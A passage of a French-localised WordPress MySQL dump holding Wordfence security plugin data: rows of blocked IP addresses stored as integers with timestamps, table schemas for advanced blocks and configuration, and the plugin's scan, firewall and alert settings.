(1342920287, 1495968064, 'Blocked by Wordfence Security Network', 0, 0, 1, 0),
(786077451, 1495973935, 'Blocked by Wordfence Security Network', 0, 0, 1, 0),
(1501163646, 1495975788, 'Blocked by Wordfence Security Network', 0, 0, 1, 0),
(2032732065, 1496015193, 'Blocked by Wordfence Security Network', 1496012990, 1, 1, 0),
(700515628, 1496014517, 'Blocked by Wordfence Security Network', 1496014518, 1, 1, 0),
(1539837113, 1496016405, 'Blocked by Wordfence Security Network', 1496016424, 20, 1, 0),
(96963116, 1496807811, 'Blocked by Wordfence Security Network', 0, 0, 1, 0),
(2734175325, 1496125580, 'Blocked by Wordfence Security Network', 1496125584, 1, 1, 0),
(1049988935, 1496512596, 'Blocked by Wordfence Security Network', 0, 0, 1, 0),
(788319630, 1496707085, 'Blocked by Wordfence Security Network', 1496707086, 2, 1, 0),
(1707700163, 1496597512, 'Blocked by Wordfence Security Network', 1496597514, 2, 1, 0),
(1266634707, 1496355424, 'Blocked by Wordfence Security Network', 1496355426, 1, 1, 0),
(1728496878, 1496843770, 'Blocked by Wordfence Security Network', 0, 0, 1, 0),
(1539836946, 1496483793, 'Blocked by Wordfence Security Network', 1496483797, 10, 1, 0),
(1539837082, 1496525607, 'Blocked by Wordfence Security Network', 1496525726, 1773, 1, 0),
(874456664, 1496597937, 'Blocked by Wordfence Security Network', 1496597938, 1, 1, 0),
(1307193800, 1496600286, 'Blocked by Wordfence Security Network', 1496600289, 4, 1, 0),
(2833926914, 1496614560, 'Blocked by Wordfence Security Network', 1496614564, 4, 1, 0),
(1168352192, 1496778654, 'Blocked by Wordfence Security Network', 0, 0, 1, 0),
(1984277895, 1496708591, 'Blocked by Wordfence Security Network', 1496708594, 1, 1, 0),
(2014968716, 1496711601, 'Blocked by Wordfence Security Network', 1496711603, 1, 1, 0),
(1053979479, 1498015746, 'Blocked by Wordfence Security Network', 0, 0, 1, 0),
(2745977144, 1496810373, 'Blocked by Wordfence Security Network', 0, 0, 1, 0),
(1109513350, 1496810935, 'Blocked by Wordfence Security Network', 1496810937, 1, 1, 0),
(3741061572, 1496831095, 'Blocked by Wordfence Security Network', 0, 0, 1, 0),
(2065606982, 1496904688, 'Blocked by Wordfence Security Network', 0, 0, 1, 0),
(1601092177, 1496919771, 'Blocked by Wordfence Security Network', 1496919773, 1, 1, 0),
(136172254, 1497016384, 'Blocked by Wordfence Security Network', 0, 0, 1, 0),
(3063980351, 1497039434, 'Blocked by Wordfence Security Network', 1497039440, 4, 1, 0),
(1985724027, 1497055578, 'Blocked by Wordfence Security Network', 0, 0, 1, 0),
(1732504327, 1497145391, 'Blocked by Wordfence Security Network', 1497145394, 1, 1, 0),
(1840808480, 1497192285, 'Blocked by Wordfence Security Network', 0, 0, 1, 0),
(2032808987, 1497197627, 'Blocked by Wordfence Security Network', 1497197883, 470, 1, 0),
(3682725338, 1498580820, 'Blocked by Wordfence Security Network', 0, 0, 1, 0),
(1547655939, 1497886873, 'Blocked by Wordfence Security Network', 0, 0, 1, 0),
(3233382727, 1497469361, 'Blocked by Wordfence Security Network', 1497469363, 1, 1, 0),
(2037512030, 1497470314, 'Blocked by Wordfence Security Network', 1497470317, 4, 1, 0),
(842965026, 1497471594, 'Blocked by Wordfence Security Network', 1497471599, 1, 1, 0),
(528486593, 1497478743, 'Blocked by Wordfence Security Network', 1497478746, 4, 1, 0),
(3386002506, 1497481887, 'Blocked by Wordfence Security Network', 1497481891, 4, 1, 0),
(1053979353, 1497483124, 'Blocked by Wordfence Security Network', 1497483126, 4, 1, 0),
(3231737508, 1497501917, 'Blocked by Wordfence Security Network', 0, 0, 1, 0),
(1741681534, 1497506948, 'Blocked by Wordfence Security Network', 1497506952, 4, 1, 0),
(1814215517, 1497526219, 'Blocked by Wordfence Security Network', 1497526221, 4, 1, 0),
(1868300323, 1497534874, 'Blocked by Wordfence Security Network', 1497534877, 4, 1, 0),
(3743340614, 1497543679, 'Blocked by Wordfence Security Network', 1497543682, 4, 1, 0),
(1833145697, 1497543771, 'Blocked by Wordfence Security Network', 1497543773, 4, 1, 0),
(2996915206, 1497551181, 'Blocked by Wordfence Security Network', 1497551184, 4, 1, 0),
(3583324972, 1497570048, 'Blocked by Wordfence Security Network', 1497570051, 4, 1, 0),
(1892867061, 1497572490, 'Blocked by Wordfence Security Network', 1497572494, 4, 1, 0),
(2050666736, 1497588364, 'Blocked by Wordfence Security Network', 1497588367, 4, 1, 0),
(1476942175, 1497599574, 'Blocked by Wordfence Security Network', 1497599577, 4, 1, 0),
(2192896078, 1497610649, 'Blocked by Wordfence Security Network', 1497610651, 4, 1, 0),
(1892747498, 1497648465, 'Blocked by Wordfence Security Network', 1497648469, 4, 1, 0),
(1439252880, 1497656260, 'Blocked by Wordfence Security Network', 1497656262, 4, 1, 0),
(1517874559, 1497656696, 'Blocked by Wordfence Security Network', 1497656698, 4, 1, 0),
(3032436716, 1497662623, 'Blocked by Wordfence Security Network', 1497662626, 4, 1, 0),
(3358968011, 1497662926, 'Blocked by Wordfence Security Network', 0, 0, 1, 0),
(3532827868, 1497663112, 'Blocked by Wordfence Security Network', 1497663116, 4, 1, 0),
(1442374564, 1497677119, 'Blocked by Wordfence Security Network', 0, 0, 1, 0),
(2875375532, 1497677735, 'Blocked by Wordfence Security Network', 1497677740, 4, 1, 0),
(3154288046, 1497684857, 'Blocked by Wordfence Security Network', 1497684859, 4, 1, 0),
(657627066, 1497685847, 'Blocked by Wordfence Security Network', 1497685850, 4, 1, 0),
(418884769, 1497688593, 'Blocked by Wordfence Security Network', 1497688596, 4, 1, 0),
(1521628389, 1497702817, 'Blocked by Wordfence Security Network', 1497702819, 4, 1, 0),
(3115319218, 1497707531, 'Blocked by Wordfence Security Network', 1497707533, 4, 1, 0),
(2975005806, 1497723937, 'Blocked by Wordfence Security Network', 1497723940, 4, 1, 0),
(1516638931, 1497745221, 'Blocked by Wordfence Security Network', 1497745227, 4, 1, 0),
(1705472359, 1497763615, 'Blocked by Wordfence Security Network', 1497763618, 4, 1, 0),
(704366584, 1497768413, 'Blocked by Wordfence Security Network', 1497768426, 4, 1, 0),
(1892043087, 1497775806, 'Blocked by Wordfence Security Network', 1497775810, 4, 1, 0),
(3318955358, 1497781902, 'Blocked by Wordfence Security Network', 1497781905, 4, 1, 0),
(3583324965, 1497789746, 'Blocked by Wordfence Security Network', 1497789748, 4, 1, 0),
(2979849631, 1497792073, 'Blocked by Wordfence Security Network', 1497792077, 4, 1, 0),
(1293700813, 1497795807, 'Blocked by Wordfence Security Network', 1497795810, 4, 1, 0),
(703027240, 1497821653, 'Blocked by Wordfence Security Network', 1497821656, 4, 1, 0),
(1935748769, 1497821831, 'Blocked by Wordfence Security Network', 1497821834, 4, 1, 0),
(1700951514, 1497825049, 'Blocked by Wordfence Security Network', 1497825052, 4, 1, 0),
(1336721696, 1497825600, 'Blocked by Wordfence Security Network', 0, 0, 1, 0),
(2376729141, 1497832841, 'Blocked by Wordfence Security Network', 0, 0, 1, 0),
(2946418994, 1497837207, 'Blocked by Wordfence Security Network', 1497837211, 4, 1, 0),
(1675930294, 1497846558, 'Blocked by Wordfence Security Network', 1497846563, 4, 1, 0),
(1539837014, 1497846596, 'Blocked by Wordfence Security Network', 1497846631, 91, 1, 0),
(2970345110, 1497851093, 'Blocked by Wordfence Security Network', 1497851096, 4, 1, 0),
(3124507901, 1497874937, 'Blocked by Wordfence Security Network', 1497874942, 4, 1, 0),
(1332056195, 1497890300, 'Blocked by Wordfence Security Network', 1497890302, 4, 1, 0),
(1451215676, 1497897223, 'Blocked by Wordfence Security Network', 1497897226, 4, 1, 0),
(1442664703, 1497918262, 'Blocked by Wordfence Security Network', 1497918265, 4, 1, 0),
(2946425103, 1497918637, 'Blocked by Wordfence Security Network', 1497918660, 4, 1, 0),
(3207991142, 1497925567, 'Blocked by Wordfence Security Network', 1497925571, 4, 1, 0),
(2982565155, 1497925775, 'Blocked by Wordfence Security Network', 1497925781, 4, 1, 0),
(1733567786, 1497926129, 'Blocked by Wordfence Security Network', 1497926133, 4, 1, 0),
(1892921625, 1497944722, 'Blocked by Wordfence Security Network', 1497944725, 4, 1, 0),
(1466596995, 1497955206, 'Blocked by Wordfence Security Network', 0, 0, 1, 0),
(3192913058, 1497987406, 'Blocked by Wordfence Security Network', 1497987408, 4, 1, 0),
(3374681884, 1498013039, 'Blocked by Wordfence Security Network', 1498013042, 4, 1, 0),
(2945386850, 1498019095, 'Blocked by Wordfence Security Network', 1498019098, 4, 1, 0),
(3661641996, 1498026975, 'Blocked by Wordfence Security Network', 0, 0, 1, 0),
(832017728, 1498027680, 'Blocked by Wordfence Security Network', 1498027683, 4, 1, 0),
(1337221594, 1498034923, 'Blocked by Wordfence Security Network', 1498034926, 4, 1, 0),
(1556308942, 1498037816, 'Blocked by Wordfence Security Network', 1498037818, 4, 1, 0),
(1021415560, 1498040515, 'Blocked by Wordfence Security Network', 1498040519, 4, 1, 0),
(1337055094, 1498040629, 'Blocked by Wordfence Security Network', 1498040633, 4, 1, 0),
(2945352912, 1498072934, 'Blocked by Wordfence Security Network', 1498072937, 4, 1, 0),
(3305249319, 1498089428, 'Blocked by Wordfence Security Network', 1498089431, 4, 1, 0),
(1442374565, 1498103802, 'Blocked by Wordfence Security Network', 0, 0, 1, 0),
(3139973540, 1498105147, 'Blocked by Wordfence Security Network', 1498105150, 4, 1, 0),
(1091807106, 1498105508, 'Blocked by Wordfence Security Network', 0, 0, 1, 0),
(19917958, 1498123952, 'Blocked by Wordfence Security Network', 1498123955, 4, 1, 0),
(1829643291, 1498138691, 'Blocked by Wordfence Security Network', 1498138694, 4, 1, 0),
(3171175154, 1498185949, 'Blocked by Wordfence Security Network', 1498185952, 4, 1, 0),
(1239185676, 1498191697, 'Blocked by Wordfence Security Network', 1498191699, 4, 1, 0),
(2630103348, 1498192947, 'Blocked by Wordfence Security Network', 1498192952, 4, 1, 0),
(1113016646, 1498195646, 'Blocked by Wordfence Security Network', 1498195649, 4, 1, 0),
(1676138367, 1498225428, 'Blocked by Wordfence Security Network', 1498225430, 4, 1, 0),
(2867854843, 1498228492, 'Blocked by Wordfence Security Network', 1498228495, 4, 1, 0),
(632957447, 1498235390, 'Blocked by Wordfence Security Network', 1498235393, 4, 1, 0),
(1309960562, 1498256590, 'Blocked by Wordfence Security Network', 1498256592, 4, 1, 0),
(3574948740, 1498260017, 'Blocked by Wordfence Security Network', 1498260019, 4, 1, 0),
(2534459701, 1498260435, 'Blocked by Wordfence Security Network', 1498260437, 4, 1, 0),
(3218485542, 1498261888, 'Blocked by Wordfence Security Network', 1498261891, 4, 1, 0),
(3154283770, 1498304584, 'Blocked by Wordfence Security Network', 1498304587, 4, 1, 0),
(1549150117, 1498308291, 'Blocked by Wordfence Security Network', 1498308293, 4, 1, 0),
(2537022330, 1498336764, 'Blocked by Wordfence Security Network', 1498336767, 4, 1, 0),
(3185558189, 1498340550, 'Blocked by Wordfence Security Network', 1498340552, 4, 1, 0),
(2390016735, 1498348106, 'Blocked by Wordfence Security Network', 1498348108, 4, 1, 0),
(1354011537, 1498350094, 'Blocked by Wordfence Security Network', 1498350097, 4, 1, 0),
(1581398262, 1498350919, 'Blocked by Wordfence Security Network', 1498350922, 4, 1, 0),
(830516292, 1498362315, 'Blocked by Wordfence Security Network', 1498362318, 4, 1, 0),
(1092327198, 1498368497, 'Blocked by Wordfence Security Network', 1498368499, 4, 1, 0),
(1549067217, 1498377155, 'Blocked by Wordfence Security Network', 1498377158, 4, 1, 0),
(1530341882, 1498383988, 'Blocked by Wordfence Security Network', 1498383991, 4, 1, 0),
(1332972736, 1498408310, 'Blocked by Wordfence Security Network', 1498408312, 4, 1, 0),
(1504019374, 1498412516, 'Blocked by Wordfence Security Network', 1498412519, 4, 1, 0),
(3127517827, 1498413084, 'Blocked by Wordfence Security Network', 1498413088, 4, 1, 0),
(1127030815, 1498415976, 'Blocked by Wordfence Security Network', 1498415981, 4, 1, 0),
(759219118, 1498419903, 'Blocked by Wordfence Security Network', 1498419906, 4, 1, 0),
(1484276859, 1498429980, 'Blocked by Wordfence Security Network', 1498429982, 4, 1, 0),
(1348626918, 1498433961, 'Blocked by Wordfence Security Network', 1498433963, 4, 1, 0),
(2042128290, 1498436983, 'Blocked by Wordfence Security Network', 1498436986, 4, 1, 0),
(792045249, 1498466958, 'Blocked by Wordfence Security Network', 1498466961, 4, 1, 0),
(1327704679, 1498473132, 'Blocked by Wordfence Security Network', 1498473134, 4, 1, 0),
(3590217870, 1498494001, 'Blocked by Wordfence Security Network', 1498494003, 4, 1, 0),
(644873987, 1498502671, 'Blocked by Wordfence Security Network', 1498502674, 4, 1, 0),
(2945444222, 1498520871, 'Blocked by Wordfence Security Network', 1498520875, 4, 1, 0),
(3708042678, 1498527976, 'Blocked by Wordfence Security Network', 0, 0, 1, 0),
(3186141464, 1498538584, 'Blocked by Wordfence Security Network', 1498538588, 4, 1, 0),
(1768737787, 1498551664, 'Blocked by Wordfence Security Network', 1498551668, 4, 1, 0),
(2851037189, 1498555788, 'Blocked by Wordfence Security Network', 1498555793, 4, 1, 0),
(3306065029, 1498566126, 'Blocked by Wordfence Security Network', 1498566128, 4, 1, 0),
(1048591873, 1498596170, 'Blocked by Wordfence Security Network', 1498596172, 4, 1, 0),
(1908305645, 1498598411, 'Blocked by Wordfence Security Network', 1498598414, 4, 1, 0),
(755475457, 1498609906, 'Blocked by Wordfence Security Network', 1498609909, 4, 1, 0),
(3293189371, 1498610198, 'Blocked by Wordfence Security Network', 1498610201, 4, 1, 0),
(3216151749, 1498610929, 'Blocked by Wordfence Security Network', 1498610936, 4, 1, 0),
(1539836950, 1500270994, 'Blocked by Wordfence Security Network', 0, 0, 1, 0),
(84796080, 1498620162, 'Blocked by Wordfence Security Network', 1498620165, 4, 1, 0),
(973497450, 1498621536, 'Blocked by Wordfence Security Network', 1498621539, 4, 1, 0),
(1133404225, 1498671023, 'Blocked by Wordfence Security Network', 1498671028, 4, 1, 0),
(2970975037, 1498688460, 'Blocked by Wordfence Security Network', 1498688463, 4, 1, 0),
(3185120017, 1498689301, 'Blocked by Wordfence Security Network', 1498689304, 4, 1, 0),
(3135207294, 1498697011, 'Blocked by Wordfence Security Network', 1498697014, 4, 1, 0),
(1329042672, 1498841034, 'Blocked by Wordfence Security Network', 1498841039, 4, 1, 0),
(3315981465, 1498854031, 'Blocked by Wordfence Security Network', 1498854034, 4, 1, 0),
(1441124516, 1498854073, 'Blocked by Wordfence Security Network', 1498854076, 4, 1, 0),
(2963878449, 1498868600, 'Blocked by Wordfence Security Network', 1498868604, 4, 1, 0),
(2094473799, 1498879565, 'Blocked by Wordfence Security Network', 1498879569, 4, 1, 0),
(657088345, 1498884446, 'Blocked by Wordfence Security Network', 1498884450, 4, 1, 0),
(2898773830, 1498884924, 'Blocked by Wordfence Security Network', 1498884929, 4, 1, 0),
(1452261118, 1498900870, 'Blocked by Wordfence Security Network', 1498900872, 4, 1, 0),
(694234475, 1498902420, 'Blocked by Wordfence Security Network', 1498902423, 4, 1, 0),
(1317833414, 1498912376, 'Blocked by Wordfence Security Network', 1498912378, 4, 1, 0),
(778276980, 1498927375, 'Blocked by Wordfence Security Network', 1498927377, 4, 1, 0),
(3211865851, 1498941320, 'Blocked by Wordfence Security Network', 1498941323, 4, 1, 0),
(1443044267, 1498949487, 'Blocked by Wordfence Security Network', 1498949491, 4, 1, 0),
(3168301617, 1498949618, 'Blocked by Wordfence Security Network', 1498949620, 4, 1, 0),
(3731698192, 1498959524, 'Blocked by Wordfence Security Network', 1498959527, 4, 1, 0),
(1549936997, 1498962762, 'Blocked by Wordfence Security Network', 1498962764, 4, 1, 0),
(1777049476, 1498967392, 'Blocked by Wordfence Security Network', 1498967395, 4, 1, 0),
(1839458818, 1498969206, 'Blocked by Wordfence Security Network', 0, 0, 1, 0),
(657922338, 1498970487, 'Blocked by Wordfence Security Network', 1498970491, 4, 1, 0),
(1235922150, 1498977974, 'Blocked by Wordfence Security Network', 1498977977, 4, 1, 0),
(2875283979, 1498990988, 'Blocked by Wordfence Security Network', 1498990991, 4, 1, 0),
(1391229745, 1499006476, 'Blocked by Wordfence Security Network', 1499006479, 4, 1, 0),
(3319952174, 1499017018, 'Blocked by Wordfence Security Network', 1499017021, 4, 1, 0),
(1363303233, 1499031006, 'Blocked by Wordfence Security Network', 1499031008, 4, 1, 0),
(3560722714, 1499039147, 'Blocked by Wordfence Security Network', 1499039150, 4, 1, 0),
(1435830550, 1499041593, 'Blocked by Wordfence Security Network', 1499041596, 4, 1, 0),
(3291887408, 1499045004, 'Blocked by Wordfence Security Network', 0, 0, 1, 0),
(1544811101, 1499045678, 'Blocked by Wordfence Security Network', 1499045681, 4, 1, 0),
(1570530821, 1499049012, 'Blocked by Wordfence Security Network', 1499049015, 4, 1, 0),
(3497108325, 1499063259, 'Blocked by Wordfence Security Network', 1499063260, 1, 1, 0),
(694199286, 1499095491, 'Blocked by Wordfence Security Network', 1499095494, 4, 1, 0),
(694508115, 1499107561, 'Blocked by Wordfence Security Network', 1499107564, 4, 1, 0),
(3033775030, 1499116960, 'Blocked by Wordfence Security Network', 1499116963, 4, 1, 0),
(1307411185, 1499118227, 'Blocked by Wordfence Security Network', 1499118230, 4, 1, 0),
(3135066780, 1499118299, 'Blocked by Wordfence Security Network', 1499118302, 4, 1, 0),
(1800230200, 1499131954, 'Blocked by Wordfence Security Network', 1499131957, 4, 1, 0),
(1040268236, 1499132310, 'Blocked by Wordfence Security Network', 1499132313, 4, 1, 0),
(3561984809, 1499168133, 'Blocked by Wordfence Security Network', 1499168135, 4, 1, 0),
(3104980322, 1499199861, 'Blocked by Wordfence Security Network', 1499199863, 4, 1, 0),
(1807545404, 1499206900, 'Blocked by Wordfence Security Network', 1499206903, 4, 1, 0),
(1768344095, 1499210805, 'Blocked by Wordfence Security Network', 1499210808, 4, 1, 0),
(2955898566, 1499212035, 'Blocked by Wordfence Security Network', 1499212037, 4, 1, 0),
(1550636993, 1499239201, 'Blocked by Wordfence Security Network', 1499239204, 4, 1, 0),
(656512273, 1499239272, 'Blocked by Wordfence Security Network', 1499239275, 4, 1, 0),
(996019409, 1499250375, 'Blocked by Wordfence Security Network', 1499250378, 4, 1, 0),
(771295430, 1499261449, 'Blocked by Wordfence Security Network', 1499261452, 4, 1, 0),
(2970739670, 1499265147, 'Blocked by Wordfence Security Network', 1499265151, 4, 1, 0),
(2631915670, 1499275902, 'Blocked by Wordfence Security Network', 1499275906, 4, 1, 0),
(1081048870, 1499279619, 'Blocked by Wordfence Security Network', 1499279620, 1, 1, 0),
(1510259739, 1499287229, 'Blocked by Wordfence Security Network', 1499287232, 4, 1, 0),
(700942233, 1499287376, 'Blocked by Wordfence Security Network', 1499287379, 4, 1, 0),
(453419362, 1499314822, 'Blocked by Wordfence Security Network', 1499314825, 4, 1, 0),
(3032446933, 1499316663, 'Blocked by Wordfence Security Network', 1499316667, 4, 1, 0),
(2058401108, 1499362597, 'Blocked by Wordfence Security Network', 1499362600, 4, 1, 0),
(2745975732, 1499383619, 'Blocked by Wordfence Security Network', 0, 0, 1, 0),
(3376883719, 1499384738, 'Blocked by Wordfence Security Network', 1499384741, 4, 1, 0),
(3133998086, 1499394278, 'Blocked by Wordfence Security Network', 1499394281, 4, 1, 0),
(1307971246, 1499405973, 'Blocked by Wordfence Security Network', 1499405976, 4, 1, 0),
(1829708752, 1499414006, 'Blocked by Wordfence Security Network', 1499414009, 4, 1, 0),
(3646079390, 1499429490, 'Blocked by Wordfence Security Network', 1499429493, 4, 1, 0),
(2058258280, 1499442606, 'Blocked by Wordfence Security Network', 1499442609, 4, 1, 0),
(2961112076, 1499461065, 'Blocked by Wordfence Security Network', 0, 0, 1, 0),
(1124218043, 1499501952, 'Blocked by Wordfence Security Network', 1499501955, 4, 1, 0),
(84712992, 1499521646, 'Blocked by Wordfence Security Network', 1499521648, 4, 1, 0),
(887721709, 1499521764, 'Blocked by Wordfence Security Network', 0, 0, 1, 0),
(1776310817, 1499555632, 'Blocked by Wordfence Security Network', 1499555635, 4, 1, 0),
(1610237772, 1499562086, 'Blocked by Wordfence Security Network', 1499562089, 4, 1, 0),
(2971068426, 1499563048, 'Blocked by Wordfence Security Network', 1499563051, 4, 1, 0),
(2979847696, 1499573766, 'Blocked by Wordfence Security Network', 1499573769, 4, 1, 0),
(16883149, 1499579491, 'Blocked by Wordfence Security Network', 1499579494, 4, 1, 0),
(837087165, 1499579723, 'Blocked by Wordfence Security Network', 1499579727, 4, 1, 0),
(3197645454, 1499583850, 'Blocked by Wordfence Security Network', 1499583853, 4, 1, 0),
(86730617, 1499583964, 'Blocked by Wordfence Security Network', 1499583967, 4, 1, 0),
(779420885, 1499623230, 'Blocked by Wordfence Security Network', 1499623233, 4, 1, 0),
(1314156440, 1499638406, 'Blocked by Wordfence Security Network', 1499638409, 4, 1, 0),
(2830446697, 1499648688, 'Blocked by Wordfence Security Network', 1499648692, 4, 1, 0),
(3032370800, 1499653013, 'Blocked by Wordfence Security Network', 1499653017, 4, 1, 0),
(2047078917, 1499654903, 'Blocked by Wordfence Security Network', 1499654906, 4, 1, 0),
(1743248074, 1499655683, 'Blocked by Wordfence Security Network', 1499655688, 4, 1, 0),
(1287217583, 1499655715, 'Blocked by Wordfence Security Network', 1499655718, 4, 1, 0),
(1892904470, 1499656486, 'Blocked by Wordfence Security Network', 1499656490, 4, 1, 0),
(36889934, 1499670007, 'Blocked by Wordfence Security Network', 1499670010, 4, 1, 0),
(1333864093, 1499692280, 'Blocked by Wordfence Security Network', 1499692283, 4, 1, 0),
(3526612805, 1499724466, 'Blocked by Wordfence Security Network', 0, 0, 1, 0),
(1410847463, 1499734210, 'Blocked by Wordfence Security Network', 1499734213, 4, 1, 0),
(1321684459, 1499746334, 'Blocked by Wordfence Security Network', 1499746336, 4, 1, 0),
(1326068261, 1499788092, 'Blocked by Wordfence Security Network', 1499788094, 4, 1, 0),
(792007333, 1499809617, 'Blocked by Wordfence Security Network', 1499809620, 4, 1, 0),
(3321488109, 1499818437, 'Blocked by Wordfence Security Network', 1499818441, 4, 1, 0),
(1326228420, 1499820445, 'Blocked by Wordfence Security Network', 1499820448, 4, 1, 0),
(1471709157, 1499853773, 'Blocked by Wordfence Security Network', 1499853775, 4, 1, 0),
(2393026044, 1499868369, 'Blocked by Wordfence Security Network', 1499868372, 4, 1, 0),
(2152704098, 1499886809, 'Blocked by Wordfence Security Network', 1499886811, 4, 1, 0),
(42616701, 1499890032, 'Blocked by Wordfence Security Network', 1499890034, 4, 1, 0),
(1581302042, 1499900484, 'Blocked by Wordfence Security Network', 1499900487, 4, 1, 0),
(1235952074, 1499918354, 'Blocked by Wordfence Security Network', 1499918356, 4, 1, 0),
(915750734, 1499950981, 'Blocked by Wordfence Security Network', 0, 0, 1, 0),
(874674276, 1499961687, 'Blocked by Wordfence Security Network', 0, 0, 1, 0),
(3481717135, 1499965444, 'Blocked by Wordfence Security Network', 1499965447, 4, 1, 0),
(583622267, 1499989888, 'Blocked by Wordfence Security Network', 0, 0, 1, 0),
(3197462569, 1499993182, 'Blocked by Wordfence Security Network', 1499993185, 4, 1, 0),
(2927706329, 1499993631, 'Blocked by Wordfence Security Network', 0, 0, 1, 0),
(702461109, 1499994082, 'Blocked by Wordfence Security Network', 1499994085, 4, 1, 0),
(920891349, 1500001332, 'Blocked by Wordfence Security Network', 0, 0, 1, 0),
(585452219, 1500205955, 'Blocked by Wordfence Security Network', 0, 0, 1, 0),
(3577295515, 1500011864, 'Blocked by Wordfence Security Network', 1500011867, 4, 1, 0),
(455217818, 1500023470, 'Blocked by Wordfence Security Network', 1500023473, 4, 1, 0),
(1337027635, 1500048293, 'Blocked by Wordfence Security Network', 1500048296, 4, 1, 0),
(634555953, 1500054931, 'Blocked by Wordfence Security Network', 1500054934, 4, 1, 0),
(404453904, 1500062586, 'Blocked by Wordfence Security Network', 1500062589, 4, 1, 0),
(692377094, 1500063161, 'Blocked by Wordfence Security Network', 1500063165, 4, 1, 0),
(1376975531, 1500073515, 'Blocked by Wordfence Security Network', 1500073518, 4, 1, 0),
(3141400205, 1500087266, 'Blocked by Wordfence Security Network', 1500087270, 4, 1, 0),
(585330554, 1500087688, 'Blocked by Wordfence Security Network', 0, 0, 1, 0),
(1293927825, 1500094419, 'Blocked by Wordfence Security Network', 1500094422, 4, 1, 0),
(835573799, 1500095941, 'Blocked by Wordfence Security Network', 0, 0, 1, 0),
(1976044991, 1500106175, 'Blocked by Wordfence Security Network', 1500106179, 4, 1, 0),
(1297608708, 1500106398, 'Blocked by Wordfence Security Network', 1500106400, 4, 1, 0),
(874893407, 1500126458, 'Blocked by Wordfence Security Network', 0, 0, 1, 0),
(585291184, 1500152033, 'Blocked by Wordfence Security Network', 0, 0, 1, 0),
(3319954936, 1500160451, 'Blocked by Wordfence Security Network', 1500160454, 4, 1, 0),
(3042655538, 1500169905, 'Blocked by Wordfence Security Network', 1500169908, 4, 1, 0),
(3361094801, 1500178800, 'Blocked by Wordfence Security Network', 1500178804, 4, 1, 0),
(919161641, 1500178945, 'Blocked by Wordfence Security Network', 0, 0, 1, 0),
(1678835878, 1500181716, 'Blocked by Wordfence Security Network', 1500181718, 4, 1, 0),
(1744517895, 1500185547, 'Blocked by Wordfence Security Network', 1500185550, 4, 1, 0),
(584188065, 1500224743, 'Blocked by Wordfence Security Network', 0, 0, 1, 0),
(1887841908, 1500264744, 'Blocked by Wordfence Security Network', 1500264747, 4, 1, 0),
(1539428482, 1500281761, 'Blocked by Wordfence Security Network', 1500281764, 4, 1, 0),
(874738092, 1500333061, 'Blocked by Wordfence Security Network', 0, 0, 1, 0),
(1729078788, 1500314583, 'Blocked by Wordfence Security Network', 1500314586, 4, 1, 0),
(3164695660, 1500326083, 'Blocked by Wordfence Security Network', 1500326086, 4, 1, 0),
(1855096721, 1500346158, 'Blocked by Wordfence Security Network', 1500346162, 4, 1, 0),
(1237999338, 1500346277, 'Blocked by Wordfence Security Network', 1500346281, 4, 1, 0),
(598145435, 1500357616, 'Blocked by Wordfence Security Network', 0, 0, 1, 0),
(1422229100, 1500365654, 'Blocked by Wordfence Security Network', 1500365656, 4, 1, 0),
(598069797, 1500376266, 'Blocked by Wordfence Security Network', 0, 0, 1, 0),
(885815617, 1500386439, 'Blocked by Wordfence Security Network', 0, 0, 1, 0),
(3680266720, 1500390057, 'Blocked by Wordfence Security Network', 1500390060, 4, 1, 0),
(1324837478, 1500397437, 'Blocked by Wordfence Security Network', 1500397439, 4, 1, 0),
(911757147, 1500397669, 'Blocked by Wordfence Security Network', 0, 0, 1, 0),
(3410419836, 1500411035, 'Blocked by Wordfence Security Network', 0, 0, 1, 0),
(3269181341, 1500415346, 'Blocked by Wordfence Security Network', 1500415348, 4, 1, 0),
(3120616689, 1500444655, 'Blocked by Wordfence Security Network', 0, 0, 1, 0),
(3114828415, 1500446782, 'Blocked by Wordfence Security Network', 0, 0, 1, 0);

-- --------------------------------------------------------

--
-- Structure de la table `www2_wfBlocksAdv`
--

CREATE TABLE `www2_wfBlocksAdv` (
  `id` int(10) UNSIGNED NOT NULL,
  `blockType` char(2) NOT NULL,
  `blockString` varchar(255) NOT NULL,
  `ctime` int(10) UNSIGNED NOT NULL,
  `reason` varchar(255) NOT NULL,
  `totalBlocked` int(10) UNSIGNED DEFAULT '0',
  `lastBlocked` int(10) UNSIGNED DEFAULT '0'
) ENGINE=MyISAM DEFAULT CHARSET=utf8;

-- --------------------------------------------------------

--
-- Structure de la table `www2_wfConfig`
--

CREATE TABLE `www2_wfConfig` (
  `name` varchar(100) NOT NULL,
  `val` longblob
) ENGINE=MyISAM DEFAULT CHARSET=utf8;

--
-- Déchargement des données de la table `www2_wfConfig`
--

INSERT INTO `www2_wfConfig` (`name`, `val`) VALUES
('alertOn_critical', 0x31),
('alertOn_update', 0x30),
('alertOn_warnings', 0x31),
('alertOn_throttle', 0x30),
('alertOn_block', 0x31),
('alertOn_loginLockout', 0x31),
('alertOn_lostPasswdForm', 0x31),
('alertOn_adminLogin', 0x31),
('alertOn_nonAdminLogin', 0x30),
('liveTrafficEnabled', 0x31),
('advancedCommentScanning', 0x30),
('checkSpamIP', 0x30),
('spamvertizeCheck', 0x30),
('liveTraf_ignorePublishers', 0x31),
('scheduledScansEnabled', 0x31),
('scansEnabled_public', 0x30),
('scansEnabled_heartbleed', 0x31),
('scansEnabled_core', 0x31),
('scansEnabled_themes', 0x30),
('scansEnabled_plugins', 0x30),
('scansEnabled_malware', 0x31),
('scansEnabled_fileContents', 0x31),
('scansEnabled_posts', 0x31),
('scansEnabled_comments', 0x31),
('scansEnabled_passwds', 0x31),
('scansEnabled_diskSpace', 0x31),
('scansEnabled_options', 0x31),
('scansEnabled_dns', 0x31),
('scansEnabled_scanImages', 0x30),
('scansEnabled_highSense', 0x30),
('scansEnabled_oldVersions', 0x31),
('firewallEnabled', 0x31),
('blockFakeBots', 0x30),
('autoBlockScanners', 0x31),
('loginSecurityEnabled', 0x31),
('loginSec_lockInvalidUsers', 0x30),
('loginSec_maskLoginErrors', 0x31),
('loginSec_blockAdminReg', 0x31),
('loginSec_disableAuthorScan', 0x31),
('other_hideWPVersion', 0x31),
('other_noAnonMemberComments', 0x31),
('other_blockBadPOST', 0x30),
('other_scanComments', 0x31),
('other_pwStrengthOnUpdate', 0x31),
('other_WFNet', 0x31),
('other_scanOutside', 0x30),
('deleteTablesOnDeact', 0x30),
('autoUpdate', 0x30),
('disableCookies', 0x30),
('startScansRemotely', 0x30),
('addCacheComment', 0x30),
('disableCodeExecutionUploads', 0x30),
('allowHTTPSCaching', 0x30),
('debugOn', 0x30),
('email_summary_enabled', 0x31),
('email_summary_dashboard_widget_enabled', 0x31),
